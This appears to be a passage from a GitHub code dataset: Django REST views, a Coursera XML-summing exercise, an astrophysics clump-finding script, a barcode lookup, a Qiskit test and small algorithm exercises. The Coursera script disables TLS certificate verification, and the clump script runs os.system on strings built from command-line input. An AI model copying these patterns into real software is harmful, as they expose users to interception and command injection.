'GET':\n usuario = Usuario.objects.get(idusuario=id);\n serializer = UsuarioSerializer(usuario, many=False)\n return Response(serializer.data)\n\n\n\n@api_view(['GET'])\ndef usuario_por_telefono(request, numero):\n if request.method == 'GET':\n usuario = Usuario.objects.get(numero=numero);\n serializer = UsuarioSerializer(usuario, many=False)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef usuario_por_correo(request, correo):\n if request.method == 'GET':\n usuario = Usuario.objects.get(email=correo);\n serializer = UsuarioSerializer(usuario, many=False)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef listar_logros(request, tipo):\n if request.method == 'GET':\n logros = Logro.objects.filter(tipo=tipo)\n serializer = LogroSerializer(logros, many=True)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef actividad_completada(request):\n if request.method == 'POST':\n json_data = json.loads(request.body)\n idusuario = json_data[\"idusuario\"]\n idactividad = json_data[\"idactividad\"]\n fecha = datetime.date.today()\n query = UsuarioHasActividad(idusuario, idactividad, fecha)\n query.save()\n response = {\"status\": \"success\"}\n return Response(response)\n\n","repo_name":"joseaoviedo/JolgorioWeb","sub_path":"JolgorioWebApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7001716671","text":"\"\"\" Assignment 13.1. of Coursera Python Web Access \"\"\"\n\n\nimport urllib.request\nimport urllib.parse\nimport urllib.error\nimport sys\nimport ssl\nimport xml.etree.ElementTree as ET\n\n\ndef main():\n \"\"\" Main method \"\"\"\n try:\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n\n url = input(\"Enter url:\")\n print(\"Retrieving:\", url)\n xmldata = urllib.request.urlopen(url, context=ctx).read()\n tree = ET.fromstring(xmldata)\n counts = tree.findall('.//count')\n sum_of_counts = 0\n for count in counts:\n sum_of_counts = sum_of_counts + int(count.text)\n print(sum_of_counts)\n except:\n print(sys.exc_info())\n\n\nmain()\n","repo_name":"pramodrao/PyLabs","sub_path":"Coursera_Python_Access_Web_Data/assignment_13_1.py","file_name":"assignment_13_1.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12530914831","text":"import yt\nfrom yt.data_objects.level_sets.api import *\nfrom foggie.utils.foggie_load import foggie_load as fl\nfrom foggie.utils.foggie_load import load_sim\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom foggie.utils.get_run_loc_etc import get_run_loc_etc\nimport argparse\nimport trident\n\ndef parse_args():\n '''Parse command line arguments. Returns args object.\n NOTE: Need to move command-line argument parsing to separate file.'''\n\n parser = argparse.ArgumentParser()\n # Optional arguments:\n parser.add_argument('--halo', metavar='halo', type=str, action='store', \\\n help='Which halo? Default is 8508 (Tempest)')\n parser.set_defaults(halo='8508')\n\n parser.add_argument('--run', metavar='run', type=str, action='store', \\\n help='Which run? Default is nref11c_nref9f. Alternative: nref11n_nref10f')\n parser.set_defaults(run='nref11c_nref9f')\n\n parser.add_argument('--output', metavar='output', type=str, action='store', \\\n help='Which output? Default is RD0027 = redshift 1')\n parser.set_defaults(output='RD0027')\n\n parser.add_argument('--system', metavar='system', type=str, action='store', \\\n help='Which system are you on? Default is ramona_pleiades')\n parser.set_defaults(system='ramona_pleiades')\n\n parser.add_argument('--pwd', dest='pwd', action='store_true', \\\n help='Just use the working directory? Default is no')\n parser.set_defaults(pwd=False)\n\n parser.add_argument('--width', metavar='width', type=float, action='store', \\\n help='Width of the box around the halo center in kpc. default = 30')\n parser.set_defaults(width=30.)\n\n parser.add_argument('--step', metavar='step', type=float, action='store', \\\n help='clumpfinder step parameter. default = 2. ')\n parser.set_defaults(step=2.)\n\n parser.add_argument('--patchname', metavar='patchname', type=str, action='store', \\\n help='Name for the patch to find clumps? Default is central_30kpc')\n parser.set_defaults(patchname='box1')\n\n parser.add_argument('--center', metavar='center', type=str, action='store', \\\n help='Center of the box in the halo center in code units. default = center1')\n parser.set_defaults(center='center1')\n\n args = parser.parse_args()\n return args\n\nargs = parse_args()\nfoggie_dir, output_dir, run_loc, code_path, trackname, haloname, spectra_dir, infofile = get_run_loc_etc(args)\npatchname = args.patchname\noutput_dir = output_dir+\"clumps/\"+patchname+'/'\nif not (os.path.exists(output_dir)): os.system('mkdir -p ' + output_dir)\nos.chdir(output_dir)\nhalo = args.halo\nsim = args.run\nsnap = args.output\n\nfilename = foggie_dir+'halo_00'+halo+'/'+sim+'/'+snap+'/'+snap\ntrack_name = trackname\n\n#ds, region = fl(filename,trackname)\nds, region = fl(filename, trackname, \\\n particle_type_for_angmom=False, do_filter_particles=False, \\\n region='refine_box') # this *SHOULD* work better, I just hope I'm not losing anything important\n# if halo_c_v file does not include the halo center, foggie_load will try to calculate it (which doesnt work without problems in yt4 so here is the workaround from Ayan using load_sim)\n\n\n#ds, refine_box = load_sim(args, region='refine_box')\n#args.halo_center = ds.halo_center_kpc\n#args.halo_velocity = ds.halo_velocity_kms\n#[centerx,centery,centerz] = ds.halo_center\n#args.halo_velocity = ds.halo_velocity_kms\n\n\n\nfor chosenion in ['O VI','C II','C IV','Si II','Si III','Si IV', 'Mg I', 'Mg II', 'H I']:\n trident.add_ion_fields(ds, ions=[chosenion])\n\nchosenwidth = args.width\n\ndx= ds.quan(chosenwidth,'kpc').in_units('code_length')\n\ndy= ds.quan(chosenwidth,'kpc').in_units('code_length')\n\ndz= ds.quan(chosenwidth,'kpc').in_units('code_length')\n\n\n[centerx,centery,centerz]=region.center\n\ncenter1 = [centerx+dx,centery,centerz]\ncenter2 = [centerx+dx,centery+dy,centerz]\ncenter3 = [centerx+dx,centery+dy,centerz+dz]\ncenter4 = [centerx+dx,centery+dy,centerz-dz]\ncenter5 = [centerx+dx,centery,centerz+dz]\ncenter6 = [centerx+dx,centery,centerz-dz]\ncenter7 = [centerx+dx,centery-dy,centerz]\ncenter8 = [centerx+dx,centery-dy,centerz+dz]\ncenter9 = [centerx+dx,centery-dy,centerz-dz]\ncenter10 = [centerx,centery,centerz]\ncenter11 = [centerx,centery+dy,centerz]\ncenter12 = [centerx,centery+dy,centerz+dz]\ncenter13 = [centerx,centery+dy,centerz-dz]\ncenter14 = [centerx,centery,centerz+dz]\ncenter15 = [centerx,centery,centerz-dz]\ncenter16 = [centerx,centery-dy,centerz]\ncenter17 = [centerx,centery-dy,centerz+dz]\ncenter18 = [centerx,centery-dy,centerz-dz]\ncenter19 = [centerx-dx,centery,centerz]\ncenter20 = [centerx-dx,centery+dy,centerz]\ncenter21 = [centerx-dx,centery+dy,centerz+dz]\ncenter22 = [centerx-dx,centery+dy,centerz-dz]\ncenter23 = [centerx-dx,centery,centerz+dz]\ncenter24 = [centerx-dx,centery,centerz-dz]\ncenter25 = [centerx-dx,centery-dy,centerz]\ncenter26 = [centerx-dx,centery-dy,centerz+dz]\ncenter27 = [centerx-dx,centery-dy,centerz-dz]\n\n\nif args.center == 'center1':\n chosencenter = center1\nif args.center == 'center2':\n chosencenter = center2\nif args.center == 'center3':\n chosencenter = center3\nif args.center == 'center4':\n chosencenter = center4\nif args.center == 'center5':\n chosencenter = center5\nif args.center == 'center6':\n chosencenter = center6\nif args.center == 'center7':\n chosencenter = center7\nif args.center == 'center8':\n chosencenter = center8\nif args.center == 'center9':\n chosencenter = center9\nif args.center == 'center10':\n chosencenter = center10\nif args.center == 'center11':\n chosencenter = center11\nif args.center == 'center12':\n chosencenter = center12\nif args.center == 'center13':\n chosencenter = center13\nif args.center == 'center14':\n chosencenter = center14\nif args.center == 'center15':\n chosencenter = center15\nif args.center == 'center16':\n chosencenter = center16\nif args.center == 'center17':\n chosencenter = center17\nif args.center == 'center18':\n chosencenter = center18\nif args.center == 'center19':\n chosencenter = center19\nif args.center == 'center20':\n chosencenter = center20\nif args.center == 'center21':\n chosencenter = center21\nif args.center == 'center22':\n chosencenter = center22\nif args.center == 'center23':\n chosencenter = center23\nif args.center == 'center24':\n chosencenter = center24\nif args.center == 'center25':\n chosencenter = center25\nif args.center == 'center26':\n chosencenter = center26\nif args.center == 'center27':\n chosencenter = center27\n\n#print(center)\ndata_source = ds.sphere(chosencenter, (chosenwidth, 'kpc'))\n\n#yt.ProjectionPlot(ds, 2, (\"gas\", \"density\"), center=chosencenter, width=(chosenwidth,'kpc'),data_source=data_source, weight_field=(\"gas\", \"density\")).show()\n\n#yt.ProjectionPlot(ds, 2, (\"gas\", \"temperature\"), center=chosencenter, width=(chosenwidth,'kpc'),data_source=data_source, weight_field=(\"gas\", \"density\")).show()\n\n#yt.ProjectionPlot(ds, 2, (\"gas\", \"metallicity\"), center=chosencenter, width=(chosenwidth,'kpc'),data_source=data_source, weight_field=(\"gas\", \"density\")).show()\n\n\nmaster_clump = Clump(data_source, (\"gas\", \"density\"))\nmaster_clump.add_validator(\"min_cells\", 20)\nc_min = data_source[\"gas\", \"density\"].min()\nc_max = data_source[\"gas\", \"density\"].max()\nstep = args.step #100. #2.0\nfind_clumps(master_clump, c_min, c_max, step)\n\nleaf_clumps = master_clump.leaves\nprj = yt.ProjectionPlot(ds, 0, (\"gas\", \"density\"),\n # center=chosencenter, width=(chosenwidth,'kpc'),weight_field=(\"gas\", \"density\"), data_source=data_source)\n center=chosencenter, width=(chosenwidth,'kpc'), data_source=data_source)\n\nprj.annotate_clumps(leaf_clumps)\nplotsdir = output_dir +'plots'\nif not (os.path.exists(plotsdir)): os.system('mkdir -p ' + plotsdir)\nprj.save(plotsdir+'/halo_00'+halo+'_'+sim+'_'+snap+'_'+snap+'_clumps_density.png')\n#prj.show()\n\nmaster_clump.add_info_item(\"total_cells\")\nmaster_clump.add_info_item(\"cell_mass\")\nmaster_clump.add_info_item(\"mass_weighted_jeans_mass\")\nmaster_clump.add_info_item(\"volume_weighted_jeans_mass\")\nmaster_clump.add_info_item(\"max_grid_level\")\nmaster_clump.add_info_item(\"min_number_density\")\nmaster_clump.add_info_item(\"max_number_density\")\nmaster_clump.add_info_item(\"center_of_mass\")\nmaster_clump.add_info_item(\"distance_to_main_clump\")\n\n\n\nfields_of_interest = [(\"gas\", \"density\"),(\"gas\", \"temperature\"), (\"gas\", \"metallicity\"),\"particle_mass\",'particle_position',(\"gas\", 'cell_mass'),(\"gas\", \"cell_volume\"), \\\n (\"gas\", 'radial_velocity_corrected'), \\\n (\"gas\", 'Si_p1_number_density'), (\"gas\", 'Si_p2_number_density'), (\"gas\", 'Si_p3_number_density'), (\"gas\", 'C_p1_number_density'), (\"gas\", 'C_p3_number_density'), (\"gas\", 'O_p5_number_density'), (\"gas\", 'Mg_p0_number_density'),(\"gas\", 'Mg_p1_number_density'),(\"gas\", 'H_p0_number_density'), \\\n (\"gas\", 'Si_p1_mass'), (\"gas\", 'Si_p2_mass'), (\"gas\", 'Si_p3_mass'), (\"gas\", 'C_p1_mass'), (\"gas\", 'C_p3_mass'), (\"gas\", 'O_p5_mass'), (\"gas\", 'Mg_p0_mass'),(\"gas\", 'Mg_p1_mass'),(\"gas\", 'H_p0_mass') \\\n ]\n\n\nfn = master_clump.save_as_dataset(filename='halo_00'+halo+'_'+sim+'_'+snap+'_'+snap+'_clumps_tree',fields=fields_of_interest)\nleaf_clumps = master_clump.leaves\n\nindclumpdir = output_dir +'individual_clumps'\nif not (os.path.exists(indclumpdir)): os.system('mkdir -p ' + indclumpdir)\nfor clump in leaf_clumps:\n clumpfn=str(clump.clump_id)+'_single_clump'\n #clump.save_as_dataset(filename=clumpfn,fields=[\"density\", \"particle_mass\",'particle_position'])\n clump.data.save_as_dataset(filename=indclumpdir+'/'+clumpfn,fields=fields_of_interest)\n\n\nfilename = 'halo_00'+halo+'_'+sim+'_'+snap+'_'+snap+'_clumps_cut_region'\nmaster_clump.data.save_as_dataset(filename=filename,fields=fields_of_interest)\n\n\"\"\"\nclumpmasses = []\nclumpvolumes = []\nfailedclumps = []\nfor i in range(100):\n i=i+1\n clumpfile=str(i)+\"_single_clump.h5\"\n if (os.path.exists(clumpfile)):\n clump1 = yt.load(clumpfile)\n ad = clump1.all_data()\n try:\n clumpmass = ad[\"gas\", \"cell_mass\"].sum().in_units(\"Msun\")\n clumpvolume = ad[\"gas\", \"cell_volume\"].sum().in_units(\"kpc**3\")\n print(i)\n print(clumpmass)\n print(clumpvolume)\n clumpmasses.append(clumpmass)\n clumpvolumes.append(clumpvolume)\n\n except ValueError:\n failedclumps.append(i)\n pass\n\nprint('Failed clumps: ')\nprint(failedclumps)\n\nclumpmasses=np.array(clumpmasses)\nclumpvolumes=np.array(clumpvolumes)\n\n\nplt.figure()\nplt.hist(clumpvolumes)\nplt.savefig('clumpvolumes.png')\n\nplt.figure()\nplt.hist(clumpmasses)\nplt.savefig('clumpmasses.png')\n\n\nclumpradii = (3/4/np.pi * clumpvolumes)**(1/3)\n\nplt.figure()\nplt.hist(clumpradii)\nplt.savefig('clumpradii.png')\n\"\"\"\n","repo_name":"foggie-sims/foggie","sub_path":"foggie/clumps/full_run.py","file_name":"full_run.py","file_ext":"py","file_size_in_byte":10981,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"5522197702","text":"import cv2\r\nfrom pyzbar import pyzbar\r\nimport winsound\r\nfrom tkinter import messagebox\r\nclass Test(object):\r\n def __init__(self, bc):\r\n self.bc = bc\r\n def setBc(self, bc):\r\n self.bc = bc\r\n return\r\n def getBc(self):\r\n return self.bc\r\n def cutBc(self, bc):\r\n bc = str(bc)\r\n s = []\r\n z = \"\"\r\n for i in range(len(bc)):\r\n s.append(bc[i])\r\n s.pop(0)\r\n s.pop(0)\r\n for i in range(len(s)):\r\n z += str(s[i])\r\n print (z)\r\n return z\r\n \r\n \r\n \r\n \r\nbc = Test(0000000000)\r\n \r\ndef check(barcode):\r\n fpRef = open(\"planoguide.txt\", \"r\")\r\n x = 0\r\n while True:\r\n line = fpRef.readline()\r\n if line == \"\":\r\n fpRef.close()\r\n if x == 0:\r\n messagebox.showinfo(title = \"Error\", message = \"Item not found!\")\r\n fpRef.close()\r\n break\r\n line = line.strip()\r\n word = line.split()\r\n if barcode == word[0]:\r\n messagebox.showinfo(title = (word[4]), message = (word[2], \"Row\", word[3], \"Item\"))\r\n x += 1\r\n fpRef.close()\r\n break\r\n return\r\ndef read_barcodes(frame):\r\n barcodes = pyzbar.decode(frame) \r\n for barcode in barcodes:\r\n barcode_info = barcode.data.decode('utf-8')\r\n #print(barcode_info)\r\n bc.setBc(barcode_info)\r\n #print(bc.getBc(), \"a\")\r\n \r\n #winsound.PlaySound(\"sound2.wav\", winsound.SND_ASYNC)\r\n return frame\r\ndef main():\r\n camera = cv2.VideoCapture(0)\r\n ret, frame = camera.read()\r\n while ret:\r\n print(pyzbar.decode(frame))\r\n ret, frame = camera.read()\r\n frame = read_barcodes(frame)\r\n cv2.imshow('Big Lots Box Finder', frame)\r\n if pyzbar.decode(frame) != []:\r\n print(bc.getBc())\r\n break\r\n if cv2.waitKey(1) & 0xFF == 27:\r\n exit()\r\n break\r\n camera.release()\r\n cv2.destroyAllWindows()\r\n w = bc.getBc()\r\n x = bc.cutBc(w)\r\n bc.setBc(x)\r\n check(bc.getBc())\r\nwhile True:\r\n main()\r\n\r\n\r\n\r\n","repo_name":"drouckama/Retail-Store-Item-Locater","sub_path":"finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40032950282","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nimport plotly.express as px\r\n\r\ndata = pd.read_csv('properties.csv')\r\ndata = data.drop(labels=[\"hu5\", \"hu6\"], axis=\"columns\")\r\ndata.head()\r\n\r\n\r\ndata = MinMaxScaler().fit_transform(data)\r\npca = PCA(n_components=3)\r\npca.fit(data)\r\n\r\ndata_pca = pca.transform(data).T\r\nprint(pca.explained_variance_)\r\nprint(pca.explained_variance_ratio_)\r\n\r\n\r\n#https://plotly.com/python/pca-visualization/\r\npca = PCA(3)\r\ncomponents = pca.fit_transform(data)\r\nlabels = {\r\n str(i): f\"PC {i+1} ({var:.1f}%)\"\r\n for i, var in enumerate(pca.explained_variance_ratio_ * 100)\r\n}\r\n\r\nfig = px.scatter_matrix(\r\n components,\r\n labels=labels,\r\n dimensions=range(3)\r\n #,color = data_pca[0]\r\n)\r\nfig.update_traces(diagonal_visible=False)\r\nfig.show()","repo_name":"JPEspinoza/tarea_3_imagenes","sub_path":"pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15357332728","text":"import unittest\nimport warnings\nfrom test.aqua import QiskitAquaTestCase\nfrom ddt import ddt, data\n\nfrom qiskit import BasicAer\nfrom qiskit.circuit.library import TwoLocal\n\nfrom qiskit.aqua import QuantumInstance, aqua_globals\nfrom qiskit.aqua.operators import I, X, Z\nfrom qiskit.aqua.utils import decimal_to_binary\nfrom qiskit.aqua.components.initial_states import VarFormBased\nfrom qiskit.aqua.components.optimizers import SPSA\nfrom qiskit.aqua.algorithms import VQE\nfrom qiskit.aqua.algorithms import IQPE\n\n\n@ddt\nclass TestVQE2IQPE(QiskitAquaTestCase):\n \"\"\" Test VQE to IQPE \"\"\"\n\n def setUp(self):\n super().setUp()\n self.seed = 20798\n aqua_globals.random_seed = self.seed\n self.qubit_op = -1.052373245772859 * (I ^ I) \\\n + 0.39793742484318045 * (I ^ Z) \\\n - 0.39793742484318045 * (Z ^ I) \\\n - 0.01128010425623538 * (Z ^ Z) \\\n + 0.18093119978423156 * (X ^ X)\n\n @data('initial_state', 'circuit')\n def test_vqe_2_iqpe(self, mode):\n \"\"\" vqe to iqpe test \"\"\"\n backend = BasicAer.get_backend('qasm_simulator')\n num_qbits = self.qubit_op.num_qubits\n wavefunction = TwoLocal(num_qbits, ['ry', 'rz'], 'cz', reps=3)\n\n optimizer = SPSA(maxiter=10)\n algo = VQE(self.qubit_op, wavefunction, optimizer)\n\n quantum_instance = QuantumInstance(backend, seed_simulator=self.seed,\n seed_transpiler=self.seed)\n result = algo.run(quantum_instance)\n\n self.log.debug('VQE result: %s.', result)\n\n ref_eigenval = -1.85727503 # Known reference value\n\n num_time_slices = 1\n num_iterations = 6\n\n param_dict = result.optimal_parameters\n if mode == 'initial_state':\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=DeprecationWarning)\n state_in = VarFormBased(wavefunction, param_dict)\n else:\n state_in = wavefunction.assign_parameters(param_dict)\n\n iqpe = IQPE(self.qubit_op, state_in, num_time_slices, num_iterations,\n expansion_mode='suzuki', expansion_order=2,\n shallow_circuit_concat=True)\n quantum_instance = QuantumInstance(\n backend, shots=100, seed_transpiler=self.seed, seed_simulator=self.seed\n )\n result = iqpe.run(quantum_instance)\n\n self.log.debug('top result str label: %s', result.top_measurement_label)\n self.log.debug('top result in decimal: %s', result.top_measurement_decimal)\n self.log.debug('stretch: %s', result.stretch)\n self.log.debug('translation: %s', result.translation)\n self.log.debug('final eigenvalue from QPE: %s', result.eigenvalue)\n self.log.debug('reference eigenvalue: %s', ref_eigenval)\n self.log.debug('ref eigenvalue (transformed): %s',\n (ref_eigenval + result.translation) * result.stretch)\n self.log.debug('reference binary str label: %s', decimal_to_binary(\n (ref_eigenval.real + result.translation) * result.stretch,\n max_num_digits=num_iterations + 3,\n fractional_part_only=True\n ))\n\n self.assertAlmostEqual(result.eigenvalue.real, ref_eigenval.real, delta=1e-2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"qiskit-community/qiskit-aqua","sub_path":"test/aqua/test_vqe2iqpe.py","file_name":"test_vqe2iqpe.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":564,"dataset":"github-code","pt":"66"} +{"seq_id":"20727554587","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport random\n\nstart = None\ncur_node = None\npath = []\n\n\n\ndef update(i,n,layout,G,ax,end):\n global cur_node,path\n ax.clear()\n nodes_color = ['#1f78b4']*len(G.nodes)\n nodes_color[cur_node]='#ff0000'\n if path[-1] !=end:\n if path[-1]==cur_node:\n pass\n else:\n path.append(cur_node)\n\n if(len(list(G.adj[cur_node]))>0 and cur_node != end):\n cur_node = random.sample(list(G.adj[cur_node]),1)[0]\n nx.draw(G,pos=layout,ax=ax,node_color=nodes_color,with_labels=True)\n global start\n ax.set_title(\"Start {}, End {}\\nPath {}\".format(start,end,path))\n\n\n\ndef random_walk_animation():\n global start,cur_node\n fig, ax = plt.subplots(figsize=(6,4))\n \n # G=nx.barbell_graph(5,2) \n G=nx.gnm_random_graph(10,20)\n layout = nx.spring_layout(G)\n end = random.sample(list(G.nodes),1)[0]\n \n if start == None:\n start = random.sample(list(G.nodes),1)[0]\n cur_node = start\n path.append(cur_node)\n nodes_color = ['#1f78b4']*len(G.nodes)\n nodes_color[cur_node]='#ff0000'\n nx.draw(G,pos=layout,ax=ax,node_color=nodes_color,with_labels=True)\n \n ani = FuncAnimation(fig,update,frames=100,interval=500,fargs=(12,layout,G,ax,end))\n ani.save('animation_1.gif', writer='imagemagick')\n # plt.show()\n\n\n \n\n\nrandom_walk_animation()","repo_name":"Rougnt/RandomWalk","sub_path":"mygraph.py","file_name":"mygraph.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40990383083","text":"import time\n\nclass Cell:\n \"\"\"A Cell is a square on the chessboard, which might contain a queen. A Cell\n knows where it is on the Board, it's current state, and can interact with\n the Board through queening.\n \"\"\"\n def __init__(self, idx, board):\n self.idx = idx\n self.board = board\n self.row = idx // 8 + 1\n self.col = idx % 8 + 1\n self.is_queen = False\n self.is_attacked = False\n\n \"\"\"The cell has a queen on it, and the Board updates newly attacked cells.\n \"\"\"\n def queen(self):\n self.is_queen = True\n self.board.calculate_attacked(self)\n\n \"\"\"The cell no longer has a queen on it, and the Board recalculates all\n attacked cells.\n \"\"\"\n def unqueen(self):\n self.is_queen = False\n self.board.calculate_all_attacked()\n\nclass Board:\n \"\"\"The Board manages the state of it's Cells and provides methods for\n calculating which cells are currently attacked, and which cells a queen\n that is placed will be able to attack.\n \"\"\"\n def __init__(self):\n self.cells = [Cell(i, self) for i in range(64)]\n\n def reset(self):\n for cell in self.cells:\n cell.is_queen = False\n cell.is_attacked = False\n\n \"\"\"For debugging purposes.\"\"\"\n def display(self):\n for r in range(8):\n for c in range(8):\n cell = self.cells[r * 8 + c]\n if cell.is_queen:\n print(\" [Q]\", end=\" \")\n else:\n print(\" {:2} \".format(cell.idx), end=\" \")\n print()\n\n \"\"\"Queens a cell, if it is legal to do so given the rules.\"\"\"\n def attempt_queening(self, cell_idx):\n cell = self.cells[cell_idx]\n if cell.is_attacked == False:\n cell.queen()\n\n \"\"\"The current queens on the board.\"\"\"\n def queens(self):\n queens = []\n for cell in self.cells:\n if cell.is_queen:\n queens += [cell]\n return queens\n\n \"\"\"Sets newly attacked cells for a placed queen.\"\"\"\n def calculate_attacked(self, cell):\n for c in self.attackable_cells(cell):\n c.is_attacked = True\n\n \"\"\"Calculates all attacked cells based on the current queen set.\"\"\"\n def calculate_all_attacked(self):\n for cell in self.cells:\n cell.is_attacked = False\n for queen in self.queens():\n self.calculate_attacked(queen)\n\n \"\"\"Determines which cells are attackable from the position of a Cell.\"\"\"\n def attackable_cells(self, cell):\n cells = []\n cells.extend(self.cells_in_dir(cell, self.nw_cell))\n cells.extend(self.cells_in_dir(cell, self.n_cell))\n cells.extend(self.cells_in_dir(cell, self.ne_cell))\n cells.extend(self.cells_in_dir(cell, self.w_cell))\n cells.extend(self.cells_in_dir(cell, self.e_cell))\n cells.extend(self.cells_in_dir(cell, self.sw_cell))\n cells.extend(self.cells_in_dir(cell, self.s_cell))\n cells.extend(self.cells_in_dir(cell, self.se_cell))\n return cells\n\n \"\"\"Recursively determines and adds cells in a given direction until the edge\n of the board is reached.\n \"\"\"\n def cells_in_dir(self, cell, dir, acc_cells=[]):\n next_cell = dir(cell)\n if next_cell is not None:\n return self.cells_in_dir(next_cell, dir, acc_cells + [next_cell])\n else:\n return acc_cells\n\n def nw_cell(self, cell):\n if cell.row > 1 and cell.col > 1:\n return self.cells[cell.idx - 9]\n\n def n_cell(self, cell):\n if cell.row > 1:\n return self.cells[cell.idx - 8]\n\n def ne_cell(self, cell):\n if cell.row > 1 and cell.col < 8:\n return self.cells[cell.idx - 7]\n\n def w_cell(self, cell):\n if cell.col > 1:\n return self.cells[cell.idx - 1]\n\n def e_cell(self, cell):\n if cell.col < 8:\n return self.cells[cell.idx + 1]\n\n def sw_cell(self, cell):\n if cell.row < 8 and cell.col > 1:\n return self.cells[cell.idx + 7]\n\n def s_cell(self, cell):\n if cell.row < 8:\n return self.cells[cell.idx + 8]\n\n def se_cell(self, cell):\n if cell.row < 8 and cell.col < 8:\n return self.cells[cell.idx + 9]\n\nclass Engine:\n \"\"\"Engine connects the elements of the environment required to execute a\n strategy to solve the 8 queens problem.\n \"\"\"\n def __init__(self, board):\n self.board = board\n self.solutions = []\n\n def reset(self):\n self.board.reset()\n self.solutions = []\n\n \"\"\"Result output.\"\"\"\n def output_solutions(self, time):\n print(\"Found {} solutions in {:.2f} seconds:\".format(len(self.solutions), time))\n\n \"\"\"Runs a strategy in a clean environment and provides output.\"\"\"\n def run(self, strategy):\n self.reset()\n print(\"using: {}\".format(strategy.__name__))\n t = time.time()\n strategy(board, self.solutions)\n self.output_solutions(time.time() - t)\n\nclass Strategy:\n \"\"\"Strategy contains different search strategies that can be used to find\n solutions to the 8 queens problem.\n \"\"\"\n\n \"\"\"Checks the goal state and if achieved, adds the current state to the\n solution set.\"\"\"\n def check_and_add_solution(self, queens, solutions):\n if len(queens) == 8:\n solutions.append([queen.idx for queen in queens])\n\n \"\"\"A strategy where each each cell is inspected linearly for queening,\n queened if possible, then when all legal queens have been placed a board\n configuration is examined for success. Then, the last placed queen is\n backtracked and the next cell after that cell is inspected.\"\"\"\n def linear_backtrack(self, board, solutions):\n cell_idx = 0\n starting_cell_idx = 0\n # There must be a queen in the first row\n while starting_cell_idx < 8:\n board.attempt_queening(cell_idx)\n # if we're at the end of a run\n if cell_idx == 63:\n self.check_and_add_solution(board.queens(), solutions)\n cell_idx, starting_cell_idx = self.backtrack(cell_idx, starting_cell_idx, board.queens())\n cell_idx += 1\n\n \"\"\"Backtrack the last placed queen (or two if required) and return the\n indices of the current cell under examination and the starting cell for the\n next run through of the board.\"\"\"\n def backtrack(self, cell_idx, starting_cell_idx, queens):\n queens[-1].unqueen()\n\n # if there was only one queen, progress to next run\n if len(queens) == 1:\n return starting_cell_idx, starting_cell_idx + 1\n\n # if the last queen was on an end cell\n elif queens[-1].idx == 63:\n # unqueen the second last queen\n queens[-2].unqueen()\n # if there are no queens left, progress to next run\n if len(queens) == 2:\n return starting_cell_idx, starting_cell_idx + 1\n # otherwise, continue the run from the second last queen\n else:\n return queens[-2].idx, starting_cell_idx\n\n # otherwise, continue the run from the last queen\n else:\n return queens[-1].idx, starting_cell_idx\n\n \"\"\"A strategy where every board combination is generated then inspected,\n with the limitation that we can only place a single queen in any row or\n column, which we know is required because of problem domain knowledge.\"\"\"\n def brute_force(self, board, solutions):\n for q1 in range(8):\n for q2 in set(range(8)) - { q1 }:\n for q3 in set(range(8)) - { q1, q2 }:\n for q4 in set(range(8)) - { q1, q2, q3 }:\n for q5 in set(range(8)) - { q1, q2, q3, q4 }:\n for q6 in set(range(8)) - { q1, q2, q3, q4, q5 }:\n for q7 in set(range(8)) - { q1, q2, q3, q4, q5, q6 }:\n for q8 in set(range(8)) - { q1, q2, q3, q4, q5, q6, q7 }:\n board.reset()\n board.attempt_queening(q1 + 0 * 8)\n board.attempt_queening(q2 + 1 * 8)\n board.attempt_queening(q3 + 2 * 8)\n board.attempt_queening(q4 + 3 * 8)\n board.attempt_queening(q5 + 4 * 8)\n board.attempt_queening(q6 + 5 * 8)\n board.attempt_queening(q7 + 6 * 8)\n board.attempt_queening(q8 + 7 * 8)\n self.check_and_add_solution(board.queens(), solutions)\n\n# Establish state and run each strategy with output\nif __name__ == '__main__':\n board = Board()\n engine = Engine(board)\n strategy = Strategy()\n\n engine.run(strategy.brute_force)\n engine.run(strategy.linear_backtrack)\n","repo_name":"PhilipCastiglione/learning-machines","sub_path":"miscellany/8_queens_OO.py","file_name":"8_queens_OO.py","file_ext":"py","file_size_in_byte":9012,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"24392418576","text":"# 위상 정렬\nfrom collections import deque\nfrom collections import defaultdict\n\nn = int(input())\nbefore, after, indegree, time = defaultdict(list), defaultdict(list), defaultdict(int), defaultdict(int)\nmax_node = defaultdict(int)\nstart = []\nfor i in range(1, n+1):\n read = list(map(int, input().split()))\n time[i] = read[0]\n indegree[i] += read[1]\n for v in read[2:]:\n before[i].append(v)\n after[v].append(i)\n if not indegree[i]:\n start.append(i)\n\nqueue = deque(start)\nwhile queue:\n node = queue.popleft()\n for adj in after[node]:\n indegree[adj] -= 1\n if indegree[adj] == 0:\n queue.append(adj)\n # 선행 노드 중, 가장 시간이 오래 걸린 노드 찾기\n max_node = before[adj][0]\n for v in before[adj]:\n if time[max_node] < time[v]:\n max_node = v\n time[adj] += time[max_node]\n\nelse:\n 